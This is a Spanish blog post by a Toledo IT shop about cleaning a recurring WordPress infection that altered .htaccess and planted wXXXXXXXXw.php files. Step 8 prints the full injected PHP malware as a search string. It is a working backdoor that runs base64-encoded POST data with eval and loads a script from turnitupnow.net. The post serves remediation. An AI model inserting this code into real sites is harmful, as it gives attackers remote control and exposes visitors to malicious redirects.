htaccess modificado y insercion de archivos wordpress

Escrito por .Com Sistemas Informaticos. para Blog Mantenimiento Informatico en Toledo

Pinterest

Eliminar infeccion en wordpress de htaccess e inyeccion de codigo

htaccess modificado wordpress

He tenido ataques muy importantes en la web de un cliente basada en WordPress los cuales se basaban en que modificaban el .htaccess e insertaban archivos del tipo wXXXXXXXXw.php con numero aleatorios en las X. Sinceramente es de las pocas veces que algo me ha quitado el sueño y nunca mejor dicho porque he tenido que estar constantemente pendiente de esta web ya que le estamos realizando posicionamiento y como sabeis si google detecta que tienes una infeccion el posicionamiento se pierde, con lo cual fuera la hora que fuera he tenido que estar limpiando el .htaccess y eliminando los archivos wXXXXXXXXw.php del hosting continuamente para evitar que fueran detectados.

Cuando digo que me ha quitado el sueño es porque me he estado acostanto a las 4 o 5 de la mañana ya que limpiaba los archivos y se volvian a infectar pero finalmente he dado con la solucion y como no la he encontrado por internet creo que este post sera de gran ayuda para webmasters como yo que estan en la situacion anteriormente descrita.

ANTECEDENTES:

Este cliente tenia una web html (normal) y un dia contrato posicionamiento seo con cierta guia telefonica que como ya conocemos muchos SEO crean una pagina paralela y la posicionan pero para ello clonan la original y encargan el trabajo de posicionamiento a personal “SEO” de otros paises, en este caso hemos detectado que eran rusos.

A partir de ese dia de repente su web desaparecio y era inaccesible ni por buscadores ni por la propia direccion, es mas google decia que tenia malware. Esta fue la razon de ponerse en contacto con nosotros. La infeccion redireccionaba su web a una pagina rusa .ru de que hacia inaccesible la propia web del cliente, es una tecnica muy utilizada por gente que se dice llamar SEO y en realidad son HACKERS.

Detectamos los cambios que os pongo al principio del post y supuestamente reparo el problema pero el problema venia cuando cada 2 dias se volvia a infectar, entonces decidimos tirar la web abajo y volver a crear una nueva.

ACTUALMENTE:

Al cliente le creamos una web con muchisima calidad basada en wordpress y lo unico que mantuvimos fue una carpeta que tenia de su tienda online ( GRAVE ERROR ) . La pagina empezo a funcionar y le estamos realizando como hemos dicho posicionamiento seo.

EL PROBLEMA:

El problema ha venido cuando nos ha vuelto a dañar la misma infeccion, algo que a priori era extraño al tener nueva web pero nada extraño por lo que explicare mas adelante.

Buscando informacion sobre esta infeccion todo el mundo hablaba de los problemas de wordpress por insercion de codigo e inyeccion sql y os puedo asegurar que hemos probado todas las supuestas soluciones que daban en foros y blogs pero ninguna funcionaba, siempre ocurria lo mismo, en 2 dias la web se infectaba de nuevo.

Hemos probado de todo:

-Eliminar el contenido modificado de .htaccess
-Modificar permisos de archivos y directorios
-Instalar plugins de seguridad para ataques
-Proteger por .htaccess archivos
-Limitar por .htaccess el acceso de ciertos paises como rusia y china
-Eliminar todo y volverlo a crear
-Descargar el contenido y analizarlo con antimawares y antivirus (sin encontrar nada)
-Busqueda de timbthumb y un sin fin de cosas

LA SOLUCION DEFINITIVA:

Finalmente hemos dado con la solucion y la quiero compartir porque se los dolores de cabeza que os puede llegar a dar.

No me voy a explayar en como hemos llegado a esta conclusion porque necesitariamos que estubierais leyendo el post 2 dias y no es cuestion de eso, pero ahi va la solucion punto por punto y seguidamente la explicacion de la infeccion.

Desinfeccion:

  1. Cambia las contraseñas de usuarios wordpress
  2. Cambia las contraseñas de FTP
  3. Cambia las contraseñas de bases de datos SQL
  4. Descargar todo el contenido del hosting a tu equipo
  5. Eliminar el contenido añadido a los .htaccess (en tu equipo)
  6. Eliminar los archivos wXXXXXXXXw.php (en tu equipo)
  7. Descargar el programa REPLACE TEXT IN MANY FILES
  8. Buscar la cadena siguiente con el programa: global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = “lb11”; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = “102”; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo “<script>document.cookie='”.$sessdt_k.”=”.$sessdt_f.”‘;</script>”; } } else { if($_COOKIE[$sessdt_k]==”102″) { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo “<script>document.cookie='”.$sessdt_k.”=”.$sessdt_f.”‘;</script>”; } $sessdt_j = @$_SERVER[“HTTP_HOST”].@$_SERVER[“REQUEST_URI”]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = “http://turnitupnow.net/?rnd=”.$sessdt_f.substr($sessdt_v,-200); echo “<script src=’$sessdt_u’></script>”; echo “<meta http-equiv=’refresh’ content=’0;url=http://$sessdt_j’><!–“; } } $sessdt_p = “showimg”; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
  9. En tipo de archivo marcar *.php y *.html
  10. En opcion a realizara marcar REPLACE
  11. En el cuadro justo debajo de donde hemos puesto la cadena, simplemente ponemos un espacio
  12. Arriba en direccion buscais la carpeta que habeis descargado
  13. Pulsar START. Con esto lo que hacemos en sustituir toda la cadena de busqueda por un simple espacio con lo que limpiaremos los archivos de la infeccion.
  14. Volver a subir todo el contenido a vuestro hosting
  15. SOLUCIONADO

Con esto hemos conseguido que el cliente no se vuelva a infectar.

RAZON DE LA INFECCION:

La infeccion era debida a que como hemos dicho antes a que habia sido hackeado con anterioridad y en la carpeta que habiamos dejado (la de tienda) tenia todos los archivos php infectados con este codigo, de tal manera que cada 2 dias el codigo volvia a crear las modificaciones en htaccess, los archivos wXXXXXXXXw.php e infectaba todos los archivos php y html con el mismo codigo.

Al eliminar el codigo de todos los archivos se ha quedado solucionado, espero que os sirva , especialmente la utilidad de remplazamiento de texto porque en nuestro caso estuvimos cerca de 6 horas reemplazando el texto archivo por archivo manualmente y como os podeis imaginar nos ha sido de gran utilidad cuando la hemos encontrado.

SUERTE CON LA DESINFECCION

Horario de Tienda

Horario de Tienda
  • Mañanas 10:00 a 14:00
  • Tardes 17:00 a 20:00
  • Sabados 10:00 a 14:00
  • Servicio tecnico ordenadores en toledo
    Sat
    Servicio Tecnico
    En Taller o a Domicilio
  • Seo en toledo
    SEO
    Tu web la 1ª
    Consultores Seo en Toledo
  • mantenimiento informatico en toledo
    Servicio 24h
    Mantenimiento
    Online y presencial
  • informatica en orgaz toledo
    Informatica
    Lo tenemos!!!
    Todo lo que necesites
  • Diseño web en toledo
    Webs
    Creamos tu web
    Dinamica o estatica
  • consolas y juegos en toledo
    Consolas
    XBOX,PS,DS
    Todo en juegos y consolas